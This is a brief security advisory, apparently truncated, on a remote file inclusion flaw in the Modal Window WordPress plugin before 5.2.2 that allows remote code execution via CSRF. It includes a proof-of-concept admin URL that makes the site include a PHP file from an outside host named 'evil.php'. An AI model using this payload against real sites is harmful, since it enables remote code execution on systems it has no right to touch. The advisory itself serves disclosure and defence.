Modal Window < 5.2.2 - RFI leading to RCE via CSRF
The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. PoC http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...